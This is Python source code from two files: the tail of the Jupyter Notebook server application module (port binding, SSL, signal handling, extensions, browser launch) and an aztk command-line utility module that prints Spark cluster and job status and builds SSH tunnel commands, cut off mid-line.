self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['get_secure_cookie_kwargs'] = self.get_secure_cookie_kwargs
self.tornado_settings['token'] = self.token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical(_("Notebook servers are configured to only be run with a password."))
self.log.critical(_("Hint: run the following command to set a password"))
self.log.critical(_("\t$ python -m notebook.auth password"))
sys.exit(1)
# Socket options validation.
if self.sock:
if self.port != DEFAULT_NOTEBOOK_PORT:
self.log.critical(
_('Options --port and --sock are mutually exclusive. Aborting.'),
)
sys.exit(1)
else:
# Reset the default port if we're using a UNIX socket.
self.port = 0
if self.open_browser:
# If we're bound to a UNIX socket, we can't reliably connect from a browser.
self.log.info(
_('Ignoring --NotebookApp.open_browser due to --sock being used.'),
)
if self.file_to_run:
self.log.critical(
_('Options --NotebookApp.file_to_run and --sock are mutually exclusive.'),
)
sys.exit(1)
if sys.platform.startswith('win'):
self.log.critical(
_('Option --sock is not supported on Windows, but got value of %s. Aborting.' % self.sock),
)
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager, self.extra_services,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options,
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
# server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
# PROTOCOL_TLS is new in version 2.7.13, 3.5.3 and 3.6
ssl_options.setdefault(
'ssl_version',
getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)
)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders,
max_body_size=self.max_body_size,
max_buffer_size=self.max_buffer_size)
success = self._bind_http_server()
if not success:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
self.exit(1)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
if unix_socket_in_use(self.sock):
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
try:
sock = bind_unix_socket(self.sock, mode=int(self.sock_mode.encode(), 8))
self.http_server.add_socket(sock)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on sock %s denied") % self.sock)
return False
else:
raise
else:
return True
def _bind_http_server_tcp(self):
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
eacces = (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES))
if sys.platform == 'cygwin':
# Cygwin has a bug that causes EPERM to be returned in this
# case instead of EACCES:
# https://cygwin.com/ml/cygwin/2019-04/msg00160.html
eacces += (errno.EPERM,)
if e.errno == errno.EADDRINUSE:
if self.port_retries:
self.log.info(_('The port %i is already in use, trying another port.') % port)
else:
self.log.info(_('The port %i is already in use.') % port)
continue
elif e.errno in eacces:
self.log.warning(_("Permission to listen on port %i denied.") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
if self.port_retries:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
else:
self.log.critical(_('ERROR: the notebook server could not be started because '
'port %i is not available.') % port)
self.exit(1)
return success
def _concat_token(self, url):
token = self.token if self._token_generated else '...'
return url_concat(url, {'token': token})
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
elif self.sock:
url = self._unix_sock_url()
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._tcp_url(ip)
if self.token and not self.sock:
url = self._concat_token(url)
if not self.custom_display_url:
url += '\n or %s' % self._concat_token(self._tcp_url('127.0.0.1'))
return url
@property
def connection_url(self):
if self.sock:
return self._unix_sock_url()
else:
ip = self.ip if self.ip else 'localhost'
return self._tcp_url(ip)
def _unix_sock_url(self, token=None):
return '%s%s' % (urlencode_unix_socket(self.sock), self.base_url)
def _tcp_url(self, ip, port=None):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, port or self.port, self.base_url)
def init_terminals(self):
if not self.terminals_enabled:
return
try:
from .terminal import initialize
initialize(nb_app=self)
self.terminals_available = True
except ImportError as e:
self.log.warning(_("Terminals not available (error was %s)"), e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info(_('interrupted'))
print(self.notebook_info())
yes = _('y')
no = _('n')
sys.stdout.write(_("Shutdown this notebook server (%s/[%s])? ") % (yes, no))
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith(yes) and no not in line.lower():
self.log.critical(_("Shutdown confirmed"))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
else:
print(_("No answer for 5s:"), end=' ')
print(_("resuming operation..."))
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical(_("received signal %s, stopping"), sig)
self.io_loop.add_callback_from_signal(self.io_loop.stop)
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extension_config(self):
"""Consolidate server extensions specified by all configs.
The resulting list is stored on self.nbserver_extensions and updates config object.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
# Don't override disable state of the extension if it already exist
# in the new traitlet
if not modulename in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in sorted(extensions.items()):
if modulename not in self.nbserver_extensions:
self.config.NotebookApp.nbserver_extensions.update({modulename: enabled})
self.nbserver_extensions.update({modulename: enabled})
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
for modulename, enabled in sorted(self.nbserver_extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning(_("Error loading server extension %s"), modulename,
exc_info=True)
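    # A minimal sketch of such an extension module (added for illustration; not
    # part of this file). A module listed in `nbserver_extensions` only needs to
    # expose the hook imported above:
    #
    #   def load_jupyter_server_extension(nbapp):
    #       nbapp.log.info("my_extension loaded")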
def init_mime_overrides(self):
# On some Windows machines, an application has registered incorrect
# mimetypes in the registry.
# Tornado uses this when serving .css and .js files, causing browsers to
# reject these files. We know the mimetype always needs to be text/css for css
# and application/javascript for JS, so we override it here
# and explicitly tell the mimetypes to not trust the Windows registry
if os.name == 'nt':
# do not trust windows registry, which regularly has bad info
mimetypes.init(files=[])
# ensure css, js are correct, which are required for pages to function
mimetypes.add_type('text/css', '.css')
mimetypes.add_type('application/javascript', '.js')
# for python <3.8
mimetypes.add_type('application/wasm', '.wasm')
def shutdown_no_activity(self):
"""Shutdown server on timeout when there are no kernels or terminals."""
km = self.kernel_manager
if len(km) != 0:
return # Kernels still running
if self.terminals_available:
term_mgr = self.web_app.settings['terminal_manager']
if term_mgr.terminals:
return # Terminals still running
seconds_since_active = \
(utcnow() - self.web_app.last_activity()).total_seconds()
self.log.debug("No activity for %d seconds.",
seconds_since_active)
if seconds_since_active > self.shutdown_no_activity_timeout:
self.log.info("No kernels or terminals for %d seconds; shutting down.",
seconds_since_active)
self.stop()
def init_shutdown_no_activity(self):
if self.shutdown_no_activity_timeout > 0:
self.log.info("Will shut down after %d seconds with no kernels or terminals.",
self.shutdown_no_activity_timeout)
pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
pc.start()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado <6.1 is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8) and tornado.version_info < (6, 1):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(self, argv=None):
self._init_asyncio_patch()
super().initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_resources()
self.init_configurables()
self.init_server_extension_config()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
self.init_shutdown_no_activity()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext('Shutting down %d kernel', 'Shutting down %d kernels', n_kernels)
self.log.info(kernel_msg % n_kernels)
run_sync(self.kernel_manager.shutdown_all())
def cleanup_terminals(self):
"""Shutdown all terminals.
The terminals will shutdown themselves when this process no longer exists,
but explicit shutdown allows the TerminalManager to cleanup.
"""
if not self.terminals_available:
return
terminal_manager = self.web_app.settings['terminal_manager']
n_terminals = len(terminal_manager.list())
terminal_msg = trans.ngettext('Shutting down %d terminal', 'Shutting down %d terminals', n_terminals)
self.log.info(terminal_msg % n_terminals)
run_sync(terminal_manager.terminate_all())
def notebook_info(self, kernel_count=True):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
if kernel_count:
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
info += kernel_msg % n_kernels
info += "\n"
# Format the info so that the URL fits on a single line in 80 char display
info += _("Jupyter Notebook {version} is running at:\n{url}".
format(version=NotebookApp.version, url=self.display_url))
if self.gateway_config.gateway_enabled:
info += _("\nKernels will be managed by the Gateway server running at:\n%s") % self.gateway_config.url
return info
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'sock': self.sock,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
try:
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
except OSError as e:
self.log.error(_("Failed to write server-info to %s: %s"),
self.info_file, e)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def write_browser_open_file(self):
"""Write an nbserver-<pid>-open.html file
This can be used to open the notebook in a browser
"""
# default_url contains base_url, but so does connection_url
open_url = self.default_url[len(self.base_url):]
with open(self.browser_open_file, 'w', encoding='utf-8') as f:
self._write_browser_open_file(open_url, f)
def _write_browser_open_file(self, url, fh):
if self.token:
url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, url)
jinja2_env = self.web_app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def remove_browser_open_file(self):
"""Remove the nbserver-<pid>-open.html file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.browser_open_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
if not self.use_redirect_file:
uri = self.default_url[len(self.base_url):]
if self.token:
uri = url_concat(uri, {'token': self.token})
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical(_("%s does not exist") % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
# Write a temporary file to open in the browser
fd, open_file = tempfile.mkstemp(suffix='.html')
with open(fd, 'w', encoding='utf-8') as fh:
self._write_browser_open_file(uri, fh)
else:
open_file = self.browser_open_file
if self.use_redirect_file:
assembled_url = urljoin('file:', pathname2url(open_file))
else:
assembled_url = url_path_join(self.connection_url, uri)
b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
threading.Thread(target=b).start()
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
super().start()
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical(_("Running as root is not recommended. Use --allow-root to bypass."))
self.exit(1)
info = self.log.info
for line in self.notebook_info(kernel_count=False).split("\n"):
info(line)
info(_("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."))
if 'dev' in notebook.__version__:
info(_("Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
"resources section at https://jupyter.org/community.html."))
self.write_server_info_file()
self.write_browser_open_file()
if (self.open_browser or self.file_to_run) and not self.sock:
self.launch_browser()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
if self.sock:
self.log.critical('\n'.join([
'\n',
'Notebook is listening on %s' % self.display_url,
'',
(
'UNIX sockets are not browser-connectable, but you can tunnel to '
                        'the instance via e.g. `ssh -L 8888:%s -N user@this_host` and then '
'open e.g. %s in a browser.'
) % (self.sock, self._concat_token(self._tcp_url('localhost', 8888)))
]))
else:
if not self.custom_display_url:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste one of these URLs:',
' %s' % self.display_url,
]))
else:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste this URL:',
' %s' % self.display_url,
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info(_("Interrupted..."))
finally:
self.remove_server_info_file()
self.remove_browser_open_file()
self.cleanup_kernels()
self.cleanup_terminals()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file_name in os.listdir(runtime_dir):
if re.match('nbserver-(.+).json', file_name):
with io.open(os.path.join(runtime_dir, file_name), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file_name))
except OSError:
pass # TODO: This should warn or log or something
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
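# Hedged usage sketch (not part of the original module; assumes this file is
# importable as `notebook.notebookapp`): enumerate the servers recorded under
# the Jupyter runtime directory using the generator defined above.
#
#   from notebook.notebookapp import list_running_servers
#   for info in list_running_servers():
#       print(info['url'], info['notebook_dir'])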
|
utils.py
|
import datetime
import getpass
import subprocess
import sys
import threading
import time
from typing import List
import azure.batch.models as batch_models
from aztk import error, utils
from aztk.models import ClusterConfiguration
from aztk.spark import models
from aztk.spark.models import ApplicationState, JobState
from aztk.utils import get_ssh_key
from . import log
def get_ssh_key_or_prompt(ssh_key, username, password, secrets_configuration):
ssh_key = get_ssh_key.get_user_public_key(ssh_key, secrets_configuration)
if username is not None and password is None and ssh_key is None:
log.warning("It is recommended to use an SSH key for user creation instead of a password.")
for i in range(3):
if i > 0:
log.error("Please try again.")
password = getpass.getpass("Please input a password for user '{0}': ".format(username))
confirm_password = getpass.getpass("Please confirm your password for user '{0}': ".format(username))
if password != confirm_password:
log.error("Password confirmation did not match.")
elif not password:
log.error("Password cannot be empty.")
else:
break
else:
raise error.AztkError(
"Failed to get valid password, cannot add user to cluster. "
"It is recommended that you provide a ssh public key in .aztk/secrets.yaml. "
"Or provide an ssh-key or password with command line parameters (--ssh-key or --password). "
"You may also run the 'aztk spark cluster add-user' command to add a user to this cluster.")
return ssh_key, password
def format_datetime(datetime, include_seconds=True):
format = '%Y-%m-%d %H:%M' + (':%S' if include_seconds else '')
return datetime.strftime(format)
def print_cluster(client, cluster: models.Cluster, internal: bool = False):
node_count = __pretty_node_count(cluster)
log.info("")
log.info("Cluster %s", cluster.id)
log.info("------------------------------------------")
log.info("State: %s", cluster.state.value)
log.info("Node Size: %s", cluster.vm_size)
log.info("Created: %s", format_datetime(cluster.pool.creation_time))
log.info("Nodes: %s", node_count)
log.info("| Dedicated: %s", __pretty_dedicated_node_count(cluster))
log.info("| Low priority: %s", __pretty_low_pri_node_count(cluster))
log.info("")
print_format = "|{:^36}| {:^19} | {:^21}| {:^10} | {:^8} |"
print_format_underline = "|{:-^36}|{:-^21}|{:-^22}|{:-^12}|{:-^10}|"
if internal:
log.info(print_format.format("Nodes", "State", "IP", "Dedicated", "Master"))
else:
log.info(print_format.format("Nodes", "State", "IP:Port", "Dedicated", "Master"))
log.info(print_format_underline.format("", "", "", "", ""))
if not cluster.nodes:
return
for node in cluster.nodes:
remote_login_settings = client.cluster.get_remote_login_settings(cluster.id, node.id)
if internal:
ip = node.ip_address
else:
ip = "{}:{}".format(remote_login_settings.ip_address, remote_login_settings.port)
log.info(
print_format.format(
node.id,
node.state.value,
ip,
"*" if node.is_dedicated else "",
"*" if node.id == cluster.master_node_id else "",
))
log.info("")
def __pretty_node_count(cluster: models.Cluster) -> str:
if cluster.pool.allocation_state is batch_models.AllocationState.resizing:
return "{} -> {}".format(cluster.total_current_nodes, cluster.total_target_nodes)
else:
return "{}".format(cluster.total_current_nodes)
def __pretty_dedicated_node_count(cluster: models.Cluster) -> str:
if (cluster.pool.allocation_state is batch_models.AllocationState.resizing or cluster.pool.state is
batch_models.PoolState.deleting) and cluster.current_dedicated_nodes != cluster.target_dedicated_nodes:
return "{} -> {}".format(cluster.current_dedicated_nodes, cluster.target_dedicated_nodes)
else:
return "{}".format(cluster.current_dedicated_nodes)
def __pretty_low_pri_node_count(cluster: models.Cluster) -> str:
if (cluster.pool.allocation_state is batch_models.AllocationState.resizing or cluster.pool.state is
batch_models.PoolState.deleting) and cluster.current_low_pri_nodes != cluster.target_low_pri_nodes:
return "{} -> {}".format(cluster.current_low_pri_nodes, cluster.target_low_pri_nodes)
else:
return "{}".format(cluster.current_low_pri_nodes)
def print_clusters(clusters: List[models.Cluster]):
print_format = "{:<34}| {:<10}| {:<20}| {:<7}| {:<16}"
print_format_underline = "{:-<34}|{:-<11}|{:-<21}|{:-<8}|{:-<17}"
log.info(print_format.format("Cluster", "State", "VM Size", "Nodes", "Created"))
log.info(print_format_underline.format("", "", "", "", ""))
for cluster in clusters:
node_count = __pretty_node_count(cluster)
log.info(
print_format.format(cluster.id, cluster.state.value, cluster.vm_size, node_count,
format_datetime(cluster.pool.creation_time, False)))
def print_clusters_quiet(clusters: List[models.Cluster]):
log.print("\n".join([str(cluster.id) for cluster in clusters]))
def stream_logs(client, cluster_id, application_name):
current_bytes = 0
while True:
app_logs = client.cluster.get_application_log(
id=cluster_id, application_name=application_name, tail=True, current_bytes=current_bytes)
log.print(app_logs.log)
if app_logs.application_state == ApplicationState.Completed:
return app_logs.exit_code
current_bytes = app_logs.total_bytes
time.sleep(3)
def ssh_in_master(
client,
cluster_id: str,
cluster_configuration: models.ClusterConfiguration,
username: str = None,
webui: str = None,
jobui: str = None,
jobhistoryui: str = None,
ports=None,
host: bool = False,
connect: bool = True,
internal: bool = False,
):
"""
SSH into head node of spark-app
:param cluster_id: Id of the cluster to ssh in
:param username: Username to use to ssh
:param webui: Port for the spark master web ui (Local port)
:param jobui: Port for the job web ui (Local port)
    :param ports: a list of local and remote ports
:type ports: [[<local-port>, <remote-port>]]
"""
# check if ssh is available, this throws OSError if ssh is not present
subprocess.call(["ssh"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Get master node id from task (job and task are both named pool_id)
cluster = client.cluster.get(cluster_id)
master_node_id = cluster.master_node_id
if master_node_id is None:
raise error.ClusterNotReadyError("Master node has not yet been picked!")
# get remote login settings for the user
remote_login_settings = client.cluster.get_remote_login_settings(cluster.id, master_node_id)
master_internal_node_ip = [node.ip_address for node in cluster.nodes if node.id == master_node_id][0]
master_node_ip = remote_login_settings.ip_address
master_node_port = remote_login_settings.port
spark_web_ui_port = utils.constants.DOCKER_SPARK_WEB_UI_PORT
spark_job_ui_port = utils.constants.DOCKER_SPARK_JOB_UI_PORT
spark_job_history_ui_port = utils.constants.DOCKER_SPARK_JOB_UI_HISTORY_PORT
ssh_command = utils.command_builder.CommandBuilder("ssh")
# get ssh private key path if specified
ssh_priv_key = client.secrets_configuration.ssh_priv_key
if ssh_priv_key is not None:
ssh_command.add_option("-i", ssh_priv_key)
ssh_command.add_argument("-t")
ssh_command.add_option("-L", "{0}:localhost:{1}".format(webui, spark_web_ui_port), enable=bool(webui))
ssh_command.add_option("-L", "{0}:localhost:{1}".format(jobui, spark_job_ui_port), enable=bool(jobui))
    ssh_command.add_option(
        "-L", "{0}:localhost:{1}".format(jobhistoryui, spark_job_history_ui_port), enable=bool(jobhistoryui))
if ports is not None:
for port in ports:
ssh_command.add_option("-L", "{0}:localhost:{1}".format(port[0], port[1]))
if cluster_configuration and cluster_configuration.plugins:
for plugin in cluster_configuration.plugins:
for port in plugin.ports:
if port.expose_publicly:
ssh_command.add_option("-L", "{0}:localhost:{1}".format(port.public_port, port.internal))
user = username if username is not None else "<username>"
if internal:
ssh_command.add_argument("{0}@{1}".format(user, master_internal_node_ip))
else:
ssh_command.add_argument("{0}@{1} -p {2}".format(user, master_node_ip, master_node_port))
if host is False:
ssh_command.add_argument("'sudo docker exec -it spark /bin/bash'")
command = ssh_command.to_str()
if connect:
subprocess.call(command, shell=True)
return "\n\t{}\n".format(command)
def print_batch_exception(batch_exception):
"""
Prints the contents of the specified Batch exception.
:param batch_exception:
"""
log.error("-------------------------------------------")
log.error("Exception encountered:")
if batch_exception.error and batch_exception.error.message and batch_exception.error.message.value:
log.error(batch_exception.error.message.value)
if batch_exception.error.values:
log.error("")
for mesg in batch_exception.error.values:
log.error("%s:\t%s", mesg.key, mesg.value)
log.error("-------------------------------------------")
def print_jobs(jobs: List[models.Job]):
print_format = "{:<34}| {:<10}| {:<20}"
print_format_underline = "{:-<34}|{:-<11}|{:-<21}"
log.info(print_format.format("Job", "State", "Creation Time"))
    log.info(print_format_underline.format("", "", ""))
for job in jobs:
log.info(print_format.format(job.id, job.state.name, utc_to_local(job.creation_time)))
def print_job(client, job: models.Job):
print_format = "{:<36}| {:<15}"
log.info("")
log.info("Job %s", job.id)
log.info("------------------------------------------")
log.info("State: %s", job.state.name)
log.info("Transition Time: %s", utc_to_local(job.state_transition_time))
log.info("")
if job.cluster:
print_cluster_summary(job.cluster)
else:
if job.state == JobState.completed:
log.info("Cluster %s", "Job completed, cluster deallocated.")
log.info("")
else:
log.info(print_format.format("Cluster", "Provisioning"))
log.info("")
if job.applications:
application_summary(job.applications)
else:
application_summary(client.job.list_applications(job.id))
log.info("")
def node_state_count(cluster: models.Cluster):
states = {}
for node in cluster.nodes:
states[node.state] = states.get(node.state, 0) + 1
return states
def print_cluster_summary(cluster: models.Cluster):
log.info("Cluster %s", cluster.id)
log.info("-" * 42)
log.info("Nodes %s", __pretty_node_count(cluster))
log.info("| Dedicated: %s", __pretty_dedicated_node_count(cluster))
log.info("| Low priority: %s", __pretty_low_pri_node_count(cluster))
state_count = node_state_count(cluster)
if state_count:
log.info("| Node States:")
for state in state_count:
log.info("| \t%s: %d", state.name, state_count[state])
log.info("Master: %s", cluster.master_node_id or "Pending")
log.info("")
def application_summary(applications):
states = {"scheduling": 0}
for state in models.ApplicationState:
states[state] = 0
warn_scheduling = False
for application in applications:
if isinstance(application, str):
states["scheduling"] += 1
warn_scheduling = True
else:
states[application.state] += 1
print_format = "{:<17} {:<14}"
log.info("Applications")
log.info("-" * 42)
    for state in states:
        if states[state] > 0:
            # "scheduling" is a plain string key; the rest are ApplicationState members.
            state_name = state if isinstance(state, str) else state.value
            log.info(print_format.format(state_name + ":", states[state]))
if warn_scheduling:
log.warning("\nNo Spark applications will be scheduled until the master is selected.")
def print_applications(applications):
print_format = "{:<36}| {:<15}| {:<16} | {:^9} |"
print_format_underline = "{:-<36}|{:-<16}|{:-<18}|{:-<11}|"
log.info(print_format.format("Applications", "State", "Transition Time", "Exit Code"))
log.info(print_format_underline.format("", "", "", ""))
warn_scheduling = False
for name in applications:
if applications[name] is None:
log.info(print_format.format(name, "scheduling", "-", "-"))
warn_scheduling = True
else:
application = applications[name]
log.info(
print_format.format(
application.name,
application.state.value,
utc_to_local(application.state_transition_time),
application.exit_code if application.exit_code is not None else "-",
))
if warn_scheduling:
log.warning("\nNo Spark applications will be scheduled until the master is selected.")
def print_application(application: models.Application):
print_format = "{:<30}| {:<15}"
log.info("")
log.info("Application %s", application.name)
log.info("-" * 42)
log.info(print_format.format("State", application.state.value))
log.info(print_format.format("State transition time", utc_to_local(application.state_transition_time)))
log.info("")
class Spinner:
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
        while True:
for cursor in "|/-\\":
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def __enter__(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
return self.stop()
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write("\b")
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task, daemon=True).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
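# Hedged usage sketch (illustrative only): display the spinner while a
# long-running call executes; any blocking call works in place of sleep().
#
#   with Spinner():
#       time.sleep(5)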
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=datetime.timezone.utc).astimezone(tz=None).strftime("%H:%M%p %d/%m/%y")
def print_cluster_conf(cluster_conf: ClusterConfiguration, wait: bool):
user_configuration = cluster_conf.user_configuration
log.info("-------------------------------------------")
log.info("cluster id: %s", cluster_conf.cluster_id)
log.info("cluster toolkit: %s %s", cluster_conf.toolkit.software, cluster_conf.toolkit.version)
log.info("cluster size: %s", cluster_conf.size + cluster_conf.size_low_priority)
log.info("> dedicated: %s", cluster_conf.size)
log.info("> low priority: %s", cluster_conf.size_low_priority)
log.info("cluster vm size: %s", cluster_conf.vm_size)
log.info("subnet ID: %s", cluster_conf.subnet_id)
log.info("file shares: %s",
